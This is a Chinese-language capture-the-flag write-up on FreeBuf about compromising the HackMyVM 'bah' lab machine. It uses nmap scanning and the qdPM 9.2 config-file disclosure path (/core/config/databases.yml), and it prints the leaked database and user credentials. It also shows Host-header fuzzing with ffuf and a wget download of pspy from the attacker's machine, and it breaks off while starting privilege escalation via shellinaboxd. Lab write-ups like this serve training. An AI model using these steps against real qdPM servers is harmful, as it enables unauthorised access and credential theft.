记一次hackmyvm综合靶场的渗透测试-bah - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

记一次hackmyvm综合靶场的渗透测试-bah

2022-03-09 17:57:14

所属地黑龙江省

本文由创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

前言

Kali攻击机：192.168.1.128

靶机：192.168.1.130

信息收集阶段

nmap -A 192.168.1.130

1646819212_6228778c3100c9a288315.png!small?1646819214025

开放了80端口和3306端口，先登录80端口，看看

漏洞利用阶段

1646819222_622877968665d3d9c43a6.png!small?1646819224262

这个CMS，这个qdPM 9.2

我们去https://www.exploit-db.com/搜一下，看有啥漏洞吗？

1646819242_622877aa5afbabddaaa95.png!small?1646819244082

数据库的密码和链接字符串存储在yml文件中

访问这个地址，你就能把文件下载下来了。

http://<website>/core/config/databases.yml

别试了，fofa上根本就没有用这个版本的CMS

抖音狗头表情包狗王写轮眼恶搞高清图片大全图片1

1646819426_622878627ad3708ee24a1.png!small?1646819428199

1646819431_62287867335225b574a71.png!small?1646819433110

1646819439_6228786f214544ef88560.png!small?1646819440897

Mysql数据库：

用户名：qpmadmin

密码：qpmpazzw

然后咱们采用上述信息登录mysql数据库。

mysql -s -h 192.168.1.130 -uqpmadmin -p
-s, --silent ：
Be more silent. Print results with a tab as separator,
each row on new line.
-h, --host=name     Connect to host.
-u, --user=name     User for login if not current user.
-p, --password[=name]
Password to use when connecting to server. If password is
not given it's asked from the tty.

1646819470_6228788e8d02ce68542da.png!small?1646819472297

登录进来可见MariaDB，这个数据库与mysql一模一样。

我们查看以下：数据库的具体信息：

1646819483_6228789bcf4fe44931cab.png!small?1646819485625

这个隐藏数据库很可疑！

1646819490_622878a2a4c1412ab484f.png!small?1646819492389

查看表格：

1646819497_622878a94b91d0e6483f4.png!small?1646819499011

查看用户这个表：

1646819502_622878ae982f189bd2747.png!small?1646819504395

查看url这个表：

1646819508_622878b4ed0f814b90fa2.png!small?1646819510876

这里把url地址复制到urls.txt中，切记不能带http://

因为请求头的host字段中直接加域名或者IP地址就可以！!

1646819519_622878bfe4697cc588aed.png!small?1646819521662

这里的思路这些地址有可能对应这个内网IP的域名信息，所以需要通过FUZZ查看哪个域名正确？

这个采用一款ffuf的fuzz工具：

Fuzz Faster U Fool - v1.3.1 Kali Exclusive <3
ffuf -c -r -u http://192.168.1.130 -H "HOST: FUZZ"  -w urls.txt

我们看下参数的意思：

-c                  Colorize output. (default: false) 彩色输出
-r                  Follow redirects (default: false)跟随重定向
-u                  Target URL 目标url
-H                 Header `"Name: Value"`, separated by colon. 这个应该指的是请求头中的HOST字段：
-w                  Wordlist file path and (optional) 指定字典

1646819543_622878d7af6b14651c68b.png!small?1646819545586

可以看到有一个回显words不一样：

这里修改一下：一下内容

1646819552_622878e0382129c59d878.png!small?1646819553923

然后直接访问：party.bah.hmv

出现登录界面：

1646819557_622878e5ce1a0404cb167.png!small?1646819559555

我们尝试使用mysql的用户名和密码试一下：

用户名：qpmadmin

密码：qpmpazzw

1646819564_622878ec5f3a512946d6d.png!small?1646819566150

登录成功：

1646819570_622878f21fedcfcd315ed.png!small?1646819571987

没有权限，需要切换到rocio这个账户上：

上面还有个表：

1646819593_62287909a5fb9b15872c8.png!small?1646819595495

rocio Ihaveaflower 不知道是不是密码：试一下！

1646819599_6228790fb49ab0bc0fcbc.png!small?1646819601463

没错：第一个flag！！！！

权限提升阶段

root权限提升：

为了root权限提升，我们采用pspy去监视进程。因为我们要求把这个二进制程序从我们的本机下载到/tmp去文件夹下。

我们在kali主机上开启HTTP。

1646819651_62287943bf683f6ec8ef8.png!small?1646819653509

wget http://192.168.1.148:8000/pspy64

1646819656_62287948b83d03fbb3a1d.png!small?1646819658481

1646819662_6228794e049e5ba40ce83.png!small?1646819663857

chmod +x pspy64

./pspy64 执行！！

1646819668_622879542df7e6116999e.png!small?1646819669888

1646819675_6228795ba7ad7f0a25bfb.png!small?1646819677416

我们可以看到一个shellinaboxd的命令。这个-s的参数被用作开启服务。我们能看到从这个二进制程序的手册页去看到如下内容：

rocio@bah:/tmp$ /usr/bin/shellinaboxd --help
Usage: shellinaboxd [OPTIONS]...
Starts an HTTP server that serves terminal emulators to AJAX enabled browsers.

开启一个HTTP服务器用模拟终端去服务于AJAX使能浏览器！！

-s, --service=SERVICE define one or more services 定义服务： 1646819681_6228796158af8ce3d5d3e.png!small?1646819683113